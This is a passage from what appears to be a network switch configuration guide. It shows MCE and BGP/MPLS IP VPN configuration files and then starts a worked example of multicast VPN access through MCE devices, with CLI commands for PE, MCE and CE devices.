port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet3/0/0
port link-type trunk
port trunk allow-pass vlan 30
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100
peer 2.2.2.9 as-number 100
peer 2.2.2.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 2.2.2.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 2.2.2.9 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 10.1.1.1 as-number 65410
#
ipv4-family vpn-instance vpnb
import-route direct
peer 10.2.1.1 as-number 65420
#
ospf 1
area 0.0.0.0
network 1.1.1.9 0.0.0.0

network 172.1.1.0 0.0.0.255


#
return
l Configuration file of PE2
#
sysname PE2
#
vlan batch 30 60 70
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 200:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
ip vpn-instance vpnb
ipv4-family
route-distinguisher 200:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif60
ip binding vpn-instance vpna
ip address 10.3.1.3 255.255.255.0
#
interface Vlanif70
ip binding vpn-instance vpnb
ip address 10.4.1.3 255.255.255.0
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 60 70
#
bgp 100
peer 1.1.1.9 as-number 100
peer 1.1.1.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
ipv4-family vpn-instance vpna
import-route ospf 100
#
ipv4-family vpn-instance vpnb
import-route ospf 200
#
ospf 1

area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 172.1.1.0 0.0.0.255
#
ospf 100 vpn-instance vpna
import-route bgp
area 0.0.0.0
network 10.3.1.0 0.0.0.255
#
ospf 200 vpn-instance vpnb
import-route bgp
area 0.0.0.0
network 10.4.1.0 0.0.0.255
#
return
l Configuration file of the MCE
#
sysname MCE
#
vlan batch 60 70
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
#
ip vpn-instance vpnb
ipv4-family
route-distinguisher 100:2
#
interface Vlanif60
ip binding vpn-instance vpna
ip address 10.3.1.2 255.255.255.0
#
interface Vlanif70
ip binding vpn-instance vpnb
ip address 10.4.1.2 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 60 70
#
interface GigabitEthernet3/0/0
port link-type trunk
port trunk allow-pass vlan 60
#
interface GigabitEthernet4/0/0
port link-type trunk
port trunk allow-pass vlan 70
#
ospf 100 vpn-instance vpna
import-route static
vpn-instance-capability simple
area 0.0.0.0
network 10.3.1.0 0.0.0.255
#
ospf 200 vpn-instance vpnb
import-route rip 200
vpn-instance-capability simple
area 0.0.0.0
network 10.4.1.0 0.0.0.255
#
rip 200 vpn-instance vpnb
version 2
network 10.0.0.0
import-route ospf 200
#
ip route-static vpn-instance vpna 192.168.1.0 255.255.255.0 10.3.1.1
#
return

l Configuration file of SwitchA


#
sysname SwitchA
#
vlan batch 60
#
interface Vlanif60
ip address 10.3.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 60
#
ip route-static 0.0.0.0 0.0.0.0 10.3.1.2
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 70
#
interface Vlanif70
ip address 10.4.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 70
#
rip 200
version 2
network 10.0.0.0
network 192.168.2.0
#
return

14.1.3 Example for Configuring Multicast VPN Access Through MCE Devices

Multicast VPN Overview


Multicast VPN technology allows multicast services to run on BGP/MPLS IP VPN networks.
This technology encapsulates multicast packets from a private network to enable the packets
to be forwarded along the multicast distribution tree (MDT) on a public network. When the
packets reach the destination network, they are decapsulated and forwarded to receivers as
multicast packets of the private network.
Multicast VPN is used to address the following problems occurring during the multicast
service deployment on BGP/MPLS IP VPN networks:
l VPN multicast packets cannot pass the reverse path forwarding (RPF) check on the
public network.
In multicast forwarding, multicast routers perform RPF checks on multicast packets
based on the multicast source address and inbound interface. Only multicast packets
from the RPF interface are forwarded. Each router needs to know the unicast route to the
multicast source. The provider (P) device on a BGP/MPLS IP VPN network does not
know the VPN routes; therefore, RPF checks fail on the P device.
l Overlapping multicast source addresses or group addresses on VPNs lead to inter-VPN
communication.

A BGP/MPLS IP VPN network allows overlapping addresses in sites on each VPN;
therefore, the multicast source addresses or group addresses of different VPNs may
overlap. A PE device must correctly forward multicast packets from a VPN to only the
users at the sites on the same VPN to prevent communication between different VPNs.
l VPN packets are forwarded in unicast mode on the public network. When the multicast
traffic volume is high, loads on the public network increase greatly.
Multicast technology ensures that each link transmits only one copy of multicast packets.
Each device replicates multicast data according to the number of outbound interfaces,
and the bandwidth consumed does not increase with the number of receivers. If the
public network supports multicast forwarding, multicast packets are replicated only at
bifurcation points on the public network. This on-demand replication mechanism reduces
loads on the public network and conserves bandwidth.
l All PE devices on a VPN can receive multicast packets from a multicast source on the
same VPN. When the multicast traffic volume is high, loads on the PE devices increase
greatly.
A VPN is composed of multiple sites, each of which connects to a different PE. Some
sites may not have receivers. If VPN multicast data is forwarded only to the PE devices
with receivers connected, burdens on PE devices are reduced.

Configuration Notes
l If multicast VPN in multicast domain (MD) mode is used on switches, the PIM-SM SSM
model cannot be used on the public network.
l Multicast VPN cannot be deployed on inter-AS BGP/MPLS IPv4 VPN networks.
l Multicast VPN cannot be deployed on BGP/MPLS IPv6 VPN networks.
l Interfaces on the following interface cards cannot be configured as member interfaces of
Eth-Trunk multicast loopback interfaces: X1E series interface cards.

Networking Requirements
As shown in Figure 14-3, a company deploys two services whose data is transmitted in
multicast mode. The VPN site blue using service A and the VPN site white using service B
both connect to the backbone network through the MCE devices. Multicast VPN in MD mode
can be deployed to meet the company's multicast service requirements. This configuration
isolates the data of the two services and reduces the multicast traffic load on the public
network.

Figure 14-3 Multicast VPN access through MCE devices
[Figure residue removed. The diagram shows Source1 in VPN Blue behind CE1 and Source2 in VPN White behind CE2, both connecting through MCE1 to PE1; PE1, P and PE2 forming the BGP/MPLS VPN backbone; and PE2 connecting through MCE2 to CE3 (VPN Blue, HostA) and CE4 (VPN White, HostB). Interface and IP address assignments are given in the procedure that follows.]
Configuration Roadmap
The configuration roadmap is as follows:

1. Configure BGP/MPLS IP VPN to ensure connectivity of the VPN network.

2. Configure multicast loopback interfaces, share-group addresses, and multicast tunnel
interfaces (MTIs) for VPN instances on the PE devices to implement multicast VPN in
MD mode.

3. Enable multicast routing and PIM on all the devices. Configure the multicast function in
the public network between the PE and P devices. Configure the multicast function in the
VPN instances between PE and MCE devices, and between the MCE and CE devices.

Procedure
Step 1 Configure BGP/MPLS IP VPN.
1. Configure the Open Shortest Path First (OSPF) protocol on the backbone network to
allow communication between the provider edge devices (PE1 and PE2) and
intermediate device P.

# Configure PE1.
<PE1> system-view
[PE1] interface loopback 0 //Create a loopback interface.
[PE1-LoopBack0] ip address 1.1.1.1 32
[PE1-LoopBack0] quit
[PE1] router id 1.1.1.1 //Set the router ID of PE1 to 1.1.1.1 for route
management.
[PE1] vlan batch 30
[PE1] interface gigabitethernet 2/0/0
[PE1-GigabitEthernet2/0/0] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[PE1-GigabitEthernet2/0/0] port trunk allow-pass vlan 30
[PE1-GigabitEthernet2/0/0] quit
[PE1] interface vlanif 30 //Create a VLANIF interface.
[PE1-Vlanif30] ip address 10.1.3.1 24
[PE1-Vlanif30] quit
[PE1] ospf
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 10.1.3.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.3.0 network segment
and that the interface belongs to Area 0.
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.1 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

The configurations on P and PE2 are similar to the configuration of PE1, and are not
mentioned here.

After the configuration is complete, OSPF neighbor relationships can be set up between
PE1, P, and PE2. Run the display ospf peer command on PE1, P, and PE2, and you can
see that the neighbors are in Full state. Run the display ip routing-table command, and
you can see that PE devices have learned the routes to Loopback0 of each other.
2. Enable basic MPLS capabilities and MPLS LDP on the provider edge devices PE1 and
PE2 to set up LDP LSPs on the MPLS backbone network.

# Configure PE1.
[PE1] mpls lsr-id 1.1.1.1 //Set the LSR ID of PE1 to 1.1.1.1.
[PE1] mpls //Enable MPLS globally.
[PE1-mpls] quit
[PE1] mpls ldp //Enable MPLS LDP globally.
[PE1-mpls-ldp] quit
[PE1] interface vlanif 30
[PE1-Vlanif30] mpls //Enable MPLS on the VLANIF interface.
[PE1-Vlanif30] mpls ldp //Enable MPLS LDP on the VLANIF interface.
[PE1-Vlanif30] quit

The configurations on P and PE2 are similar to the configuration of PE1, and are not
mentioned here.

After the configuration is complete, LDP sessions can be set up between PE1 and P and
between P and PE2. Run the display mpls ldp session command on the PE and P
devices, and you can see that LDP session is in Operational state.
3. Establish a Multiprotocol Interior Border Gateway Protocol (MP-IBGP) peer
relationship between the provider edge devices PE1 and PE2.
# Configure PE1.
[PE1] bgp 100
[PE1-bgp] peer 3.3.3.3 as-number 100 //Create BGP peer 3.3.3.3 and set
its AS number to 100.
[PE1-bgp] peer 3.3.3.3 connect-interface loopback 0 //Specify LoopBack0
as the source interface to send BGP packets to BGP peer 3.3.3.3.
[PE1-bgp] ipv4-family vpnv4 //Enter the BGP-VPNv4 address family view.
[PE1-bgp-af-vpnv4] peer 3.3.3.3 enable //Enable the local switch to
exchange BGP-VPNv4 routes with BGP peer 3.3.3.3.
[PE1-bgp-af-vpnv4] quit
[PE1-bgp] quit

# Configure PE2.
[PE2] bgp 100
[PE2-bgp] peer 1.1.1.1 as-number 100 //Create BGP peer 1.1.1.1 and set
its AS number to 100.
[PE2-bgp] peer 1.1.1.1 connect-interface loopback 0 //Specify LoopBack0
as the source interface to send BGP packets to 1.1.1.1.
[PE2-bgp] ipv4-family vpnv4 //Enter the BGP-VPNv4 address family view.
[PE2-bgp-af-vpnv4] peer 1.1.1.1 enable //Enable the local switch to
exchange BGP-VPNv4 routes with BGP peer 1.1.1.1.
[PE2-bgp-af-vpnv4] quit
[PE2-bgp] quit

After the configuration is complete, run the display bgp vpnv4 all peer command on the
PE devices. You can see that a BGP peer relationship has been set up between PE1 and
PE2 and is in Established state.
4. Create VPN instances blue and white on the provider edge devices PE1 and PE2, and
aggregate egress devices MCE1 and MCE2 for branches, to connect each service site's
egress CE to the PE devices through the MCE devices.
# Configure PE1.
[PE1] ip vpn-instance blue //Create VPN instance blue.
[PE1-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN
instance blue to 100:1.
[PE1-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the
export VPN target list and import VPN target list of VPN instance blue.
[PE1-vpn-instance-blue-af-ipv4] quit
[PE1-vpn-instance-blue] quit
[PE1] ip vpn-instance white //Create VPN instance white.
[PE1-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
instance white to 200:1.
[PE1-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to the
export VPN target list and import VPN target list of VPN instance white.
[PE1-vpn-instance-white-af-ipv4] quit
[PE1-vpn-instance-white] quit
[PE1] vlan batch 10 20
[PE1] interface gigabitethernet 1/0/0
[PE1-GigabitEthernet1/0/0] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[PE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10 20
[PE1-GigabitEthernet1/0/0] quit
[PE1] interface vlanif 10
[PE1-Vlanif10] ip binding vpn-instance blue //Bind VPN instance blue to
VLANIF10 so that VLANIF10 becomes a private network interface of VPN instance
blue.
[PE1-Vlanif10] ip address 10.1.1.1 24
[PE1-Vlanif10] quit
[PE1] interface vlanif 20
[PE1-Vlanif20] ip binding vpn-instance white //Bind VPN instance white to
VLANIF20 so that VLANIF20 becomes a private network interface of VPN instance
white.
[PE1-Vlanif20] ip address 10.1.2.1 24
[PE1-Vlanif20] quit

# Configure MCE1.
[MCE1] ip vpn-instance blue //Create VPN instance blue.
[MCE1-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN
instance blue to 100:1.
[MCE1-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the
export VPN target list and import VPN target list of VPN instance blue.
[MCE1-vpn-instance-blue-af-ipv4] quit
[MCE1-vpn-instance-blue] quit
[MCE1] ip vpn-instance white //Create VPN instance white.
[MCE1-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
instance white to 200:1.
[MCE1-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to
the export VPN target list and import VPN target list of VPN instance white.
[MCE1-vpn-instance-white-af-ipv4] quit
[MCE1-vpn-instance-white] quit
[MCE1] vlan batch 10 20 100 200
[MCE1] interface gigabitethernet 1/0/0
[MCE1-GigabitEthernet1/0/0] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[MCE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10 20
[MCE1-GigabitEthernet1/0/0] quit
[MCE1] interface gigabitethernet 1/0/1
[MCE1-GigabitEthernet1/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[MCE1-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[MCE1-GigabitEthernet1/0/1] quit
[MCE1] interface gigabitethernet 1/0/2
[MCE1-GigabitEthernet1/0/2] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[MCE1-GigabitEthernet1/0/2] port trunk allow-pass vlan 200
[MCE1-GigabitEthernet1/0/2] quit
[MCE1] interface vlanif 10
[MCE1-Vlanif10] ip binding vpn-instance blue //Bind VPN instance blue to
VLANIF10 so that VLANIF10 becomes a private network interface of VPN instance
blue.
[MCE1-Vlanif10] ip address 10.1.1.2 24
[MCE1-Vlanif10] quit
[MCE1] interface vlanif 20
[MCE1-Vlanif20] ip binding vpn-instance white //Bind VPN instance white
to VLANIF20 so that VLANIF20 becomes a private network interface of VPN
instance white.
[MCE1-Vlanif20] ip address 10.1.2.2 24
[MCE1-Vlanif20] quit
[MCE1] interface vlanif 100
[MCE1-Vlanif100] ip binding vpn-instance blue //Bind VPN instance blue to
VLANIF100 so that VLANIF100 becomes a private network interface of VPN
instance blue.
[MCE1-Vlanif100] ip address 192.168.1.1 24
[MCE1-Vlanif100] quit
[MCE1] interface vlanif 200
[MCE1-Vlanif200] ip binding vpn-instance white //Bind VPN instance white
to VLANIF200 so that VLANIF200 becomes a private network interface of VPN
instance white.
[MCE1-Vlanif200] ip address 192.168.2.1 24
[MCE1-Vlanif200] quit

# Configure PE2.
[PE2] ip vpn-instance blue //Create VPN instance blue.
[PE2-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN
instance blue to 100:1.
[PE2-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the
export VPN target list and import VPN target list of VPN instance blue.
[PE2-vpn-instance-blue-af-ipv4] quit
[PE2-vpn-instance-blue] quit
[PE2] ip vpn-instance white //Create VPN instance white.
[PE2-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
instance white to 200:1.
[PE2-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to the
export VPN target list and import VPN target list of VPN instance white.
[PE2-vpn-instance-white-af-ipv4] quit
[PE2-vpn-instance-white] quit
[PE2] vlan batch 50 60
[PE2] interface gigabitethernet 1/0/0
[PE2-GigabitEthernet1/0/0] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[PE2-GigabitEthernet1/0/0] port trunk allow-pass vlan 50 60
[PE2-GigabitEthernet1/0/0] quit
[PE2] interface vlanif 50
[PE2-Vlanif50] ip binding vpn-instance blue //Bind VPN instance blue to
VLANIF50 so that VLANIF50 becomes a private network interface of VPN instance
blue.
[PE2-Vlanif50] ip address 10.1.5.1 24
[PE2-Vlanif50] quit
[PE2] interface vlanif 60
[PE2-Vlanif60] ip binding vpn-instance white //Bind VPN instance white to
VLANIF60 so that VLANIF60 becomes a private network interface of VPN instance
white.
[PE2-Vlanif60] ip address 10.1.6.1 24
[PE2-Vlanif60] quit

# Configure MCE2.
[MCE2] ip vpn-instance blue //Create VPN instance blue.
[MCE2-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN
instance blue to 100:1.
[MCE2-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the
export VPN target list and import VPN target list of VPN instance blue.
[MCE2-vpn-instance-blue-af-ipv4] quit
[MCE2-vpn-instance-blue] quit
[MCE2] ip vpn-instance white //Create VPN instance white.
[MCE2-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
instance white to 200:1.
[MCE2-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to
the export VPN target list and import VPN target list of VPN instance white.
[MCE2-vpn-instance-white-af-ipv4] quit
[MCE2-vpn-instance-white] quit
[MCE2] vlan batch 50 60 300 400
[MCE2] interface gigabitethernet 1/0/0
[MCE2-GigabitEthernet1/0/0] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[MCE2-GigabitEthernet1/0/0] port trunk allow-pass vlan 50 60
[MCE2-GigabitEthernet1/0/0] quit
[MCE2] interface gigabitethernet 1/0/1
[MCE2-GigabitEthernet1/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[MCE2-GigabitEthernet1/0/1] port trunk allow-pass vlan 300
[MCE2-GigabitEthernet1/0/1] quit
[MCE2] interface gigabitethernet 1/0/2
[MCE2-GigabitEthernet1/0/2] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[MCE2-GigabitEthernet1/0/2] port trunk allow-pass vlan 400
[MCE2-GigabitEthernet1/0/2] quit
[MCE2] interface vlanif 50
[MCE2-Vlanif50] ip binding vpn-instance blue //Bind VPN instance blue to
VLANIF50 so that VLANIF50 becomes a private network interface of VPN instance
blue.
[MCE2-Vlanif50] ip address 10.1.5.2 24
[MCE2-Vlanif50] quit
[MCE2] interface vlanif 60
[MCE2-Vlanif60] ip binding vpn-instance white //Bind VPN instance white
to VLANIF60 so that VLANIF60 becomes a private network interface of VPN
instance white.
[MCE2-Vlanif60] ip address 10.1.6.2 24
[MCE2-Vlanif60] quit
[MCE2] interface vlanif 300
[MCE2-Vlanif300] ip binding vpn-instance blue //Bind VPN instance blue to
VLANIF300 so that VLANIF300 becomes a private network interface of VPN
instance blue.
[MCE2-Vlanif300] ip address 192.168.3.1 24
[MCE2-Vlanif300] quit
[MCE2] interface vlanif 400
[MCE2-Vlanif400] ip binding vpn-instance white //Bind VPN instance white
to VLANIF400 so that VLANIF400 becomes a private network interface of VPN
instance white.
[MCE2-Vlanif400] ip address 192.168.4.1 24
[MCE2-Vlanif400] quit

5. Configure OSPF on the provider edge devices PE1 and PE2, branches' aggregate egress
devices MCE1 and MCE2, and each service site's egress CE. Import VPN routes to the
OSPF routing table.
# Configure PE1.
[PE1] ospf 2 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
[PE1-ospf-2] import-route bgp //Import BGP routes.
[PE1-ospf-2] area 0
[PE1-ospf-2-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.1.0 network segment
and that the interface belongs to Area 0.
[PE1-ospf-2-area-0.0.0.0] quit
[PE1-ospf-2] quit
[PE1] ospf 3 vpn-instance white //Create an OSPF process to serve VPN
instance white.
[PE1-ospf-3] import-route bgp //Import BGP routes.
[PE1-ospf-3] area 0
[PE1-ospf-3-area-0.0.0.0] network 10.1.2.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.2.0 network segment
and that the interface belongs to Area 0.
[PE1-ospf-3-area-0.0.0.0] quit
[PE1-ospf-3] quit
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance blue //Enter the IPv4 address family
view of BGP-VPN instance blue.
[PE1-bgp-blue] import-route ospf 2 //Import routes of OSPF process 2.
[PE1-bgp-blue] quit
[PE1-bgp] ipv4-family vpn-instance white //Enter the IPv4 address family
view of BGP-VPN instance white
[PE1-bgp-white] import-route ospf 3 //Import routes of OSPF process 3.
[PE1-bgp-white] quit
[PE1-bgp] quit

# Configure MCE1.
[MCE1] ospf 1 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
[MCE1-ospf-1] vpn-instance-capability simple //Disable OSPF routing loop
detection.
[MCE1-ospf-1] area 0
[MCE1-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.1.0 network segment
and that the interface belongs to Area 0.
[MCE1-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.1.0 network
segment and that the interface belongs to Area 0.
[MCE1-ospf-1-area-0.0.0.0] quit
[MCE1-ospf-1] quit
[MCE1] ospf 2 vpn-instance white //Create an OSPF process to serve VPN
instance white.
[MCE1-ospf-2] vpn-instance-capability simple //Disable OSPF routing loop
detection.
[MCE1-ospf-2] area 0
[MCE1-ospf-2-area-0.0.0.0] network 10.1.2.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.2.0 network segment
and that the interface belongs to Area 0.
[MCE1-ospf-2-area-0.0.0.0] network 192.168.2.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.2.0 network
segment and that the interface belongs to Area 0.
[MCE1-ospf-2-area-0.0.0.0] quit
[MCE1-ospf-2] quit

# Configure PE2.
[PE2] ospf 2 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
[PE2-ospf-2] import-route bgp //Import BGP routes.
[PE2-ospf-2] area 0
[PE2-ospf-2-area-0.0.0.0] network 10.1.5.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.5.0 network segment
and that the interface belongs to Area 0.
[PE2-ospf-2-area-0.0.0.0] quit
[PE2-ospf-2] quit
[PE2] ospf 3 vpn-instance white //Create an OSPF process to serve VPN
instance white.
[PE2-ospf-3] import-route bgp //Import BGP routes.
[PE2-ospf-3] area 0
[PE2-ospf-3-area-0.0.0.0] network 10.1.6.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.6.0 network segment
and that the interface belongs to Area 0.
[PE2-ospf-3-area-0.0.0.0] quit
[PE2-ospf-3] quit
[PE2] bgp 100
[PE2-bgp] ipv4-family vpn-instance blue //Enter the IPv4 address family
view of BGP-VPN instance blue.
[PE2-bgp-blue] import-route ospf 2 //Import routes of OSPF process 2.
[PE2-bgp-blue] quit
[PE2-bgp] ipv4-family vpn-instance white //Enter the IPv4 address family
view of BGP-VPN instance white.
[PE2-bgp-white] import-route ospf 3 //Import routes of OSPF process 3.
[PE2-bgp-white] quit
[PE2-bgp] quit

# Configure MCE2.
[MCE2] ospf 1 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
[MCE2-ospf-1] vpn-instance-capability simple //Disable OSPF routing loop
detection.
[MCE2-ospf-1] area 0
[MCE2-ospf-1-area-0.0.0.0] network 10.1.5.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.5.0 network segment
and that the interface belongs to Area 0.
[MCE2-ospf-1-area-0.0.0.0] network 192.168.3.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.3.0 network
segment and that the interface belongs to Area 0.
[MCE2-ospf-1-area-0.0.0.0] quit
[MCE2-ospf-1] quit
[MCE2] ospf 2 vpn-instance white //Create an OSPF process to serve VPN
instance white.
[MCE2-ospf-2] vpn-instance-capability simple //Disable OSPF routing loop
detection.
[MCE2-ospf-2] area 0
[MCE2-ospf-2-area-0.0.0.0] network 10.1.6.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.6.0 network segment
and that the interface belongs to Area 0.
[MCE2-ospf-2-area-0.0.0.0] network 192.168.4.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.4.0 network
segment and that the interface belongs to Area 0.
[MCE2-ospf-2-area-0.0.0.0] quit
[MCE2-ospf-2] quit

# Configure CE1, egress for a site of service A.
[CE1] vlan batch 100 101
[CE1] interface gigabitethernet 1/0/1
[CE1-GigabitEthernet1/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE1-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[CE1-GigabitEthernet1/0/1] quit
[CE1] interface gigabitethernet 2/0/1
[CE1-GigabitEthernet2/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE1-GigabitEthernet2/0/1] port trunk allow-pass vlan 101
[CE1-GigabitEthernet2/0/1] quit
[CE1] interface vlanif 100
[CE1-Vlanif100] ip address 192.168.1.2 24
[CE1-Vlanif100] quit
[CE1] interface vlanif 101
[CE1-Vlanif101] ip address 192.168.11.1 24
[CE1-Vlanif101] quit
[CE1] ospf
[CE1-ospf-1] area 0
[CE1-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.1.0 network
segment and that the interface belongs to Area 0.
[CE1-ospf-1-area-0.0.0.0] network 192.168.11.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.11.0 network
segment and that the interface belongs to Area 0.
[CE1-ospf-1-area-0.0.0.0] quit
[CE1-ospf-1] quit

# Configure CE2, egress for a site of service B.
[CE2] vlan batch 200 201
[CE2] interface gigabitethernet 1/0/2
[CE2-GigabitEthernet1/0/2] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE2-GigabitEthernet1/0/2] port trunk allow-pass vlan 200
[CE2-GigabitEthernet1/0/2] quit
[CE2] interface gigabitethernet 2/0/1
[CE2-GigabitEthernet2/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE2-GigabitEthernet2/0/1] port trunk allow-pass vlan 201
[CE2-GigabitEthernet2/0/1] quit
[CE2] interface vlanif 200
[CE2-Vlanif200] ip address 192.168.2.2 24
[CE2-Vlanif200] quit
[CE2] interface vlanif 201
[CE2-Vlanif201] ip address 192.168.12.1 24
[CE2-Vlanif201] quit
[CE2] ospf
[CE2-ospf-1] area 0
[CE2-ospf-1-area-0.0.0.0] network 192.168.2.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.2.0 network
segment and that the interface belongs to Area 0.
[CE2-ospf-1-area-0.0.0.0] network 192.168.12.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.12.0 network
segment and that the interface belongs to Area 0.
[CE2-ospf-1-area-0.0.0.0] quit
[CE2-ospf-1] quit

# Configure CE3, egress for a site of service A.
[CE3] vlan batch 300 301
[CE3] interface gigabitethernet 1/0/1
[CE3-GigabitEthernet1/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE3-GigabitEthernet1/0/1] port trunk allow-pass vlan 300
[CE3-GigabitEthernet1/0/1] quit
[CE3] interface gigabitethernet 2/0/1
[CE3-GigabitEthernet2/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE3-GigabitEthernet2/0/1] port trunk allow-pass vlan 301
[CE3-GigabitEthernet2/0/1] quit
[CE3] interface vlanif 300
[CE3-Vlanif300] ip address 192.168.3.2 24
[CE3-Vlanif300] quit
[CE3] interface vlanif 301
[CE3-Vlanif301] ip address 192.168.13.1 24
[CE3-Vlanif301] quit
[CE3] ospf
[CE3-ospf-1] area 0
[CE3-ospf-1-area-0.0.0.0] network 192.168.3.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.3.0 network
segment and that the interface belongs to Area 0.
[CE3-ospf-1-area-0.0.0.0] network 192.168.13.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.13.0 network
segment and that the interface belongs to Area 0.
[CE3-ospf-1-area-0.0.0.0] quit
[CE3-ospf-1] quit

# Configure CE4, egress for a site of service B.
[CE4] vlan batch 400 401
[CE4] interface gigabitethernet 1/0/2
[CE4-GigabitEthernet1/0/2] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE4-GigabitEthernet1/0/2] port trunk allow-pass vlan 400
[CE4-GigabitEthernet1/0/2] quit
[CE4] interface gigabitethernet 2/0/1
[CE4-GigabitEthernet2/0/1] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[CE4-GigabitEthernet2/0/1] port trunk allow-pass vlan 401
[CE4-GigabitEthernet2/0/1] quit
[CE4] interface vlanif 400
[CE4-Vlanif400] ip address 192.168.4.2 24
[CE4-Vlanif400] quit
[CE4] interface vlanif 401
[CE4-Vlanif401] ip address 192.168.14.1 24
[CE4-Vlanif401] quit
[CE4] ospf
[CE4-ospf-1] area 0
[CE4-ospf-1-area-0.0.0.0] network 192.168.4.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.4.0 network
segment and that the interface belongs to Area 0.
[CE4-ospf-1-area-0.0.0.0] network 192.168.14.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 192.168.14.0 network
segment and that the interface belongs to Area 0.
[CE4-ospf-1-area-0.0.0.0] quit
[CE4-ospf-1] quit

After the configuration is complete, run the display ip routing-table vpn-instance vpn-
instance-name command on the PE or MCE devices. You can see that the local PE or
MCE device has a VPN route to the remote PE. Run the display ip routing-table
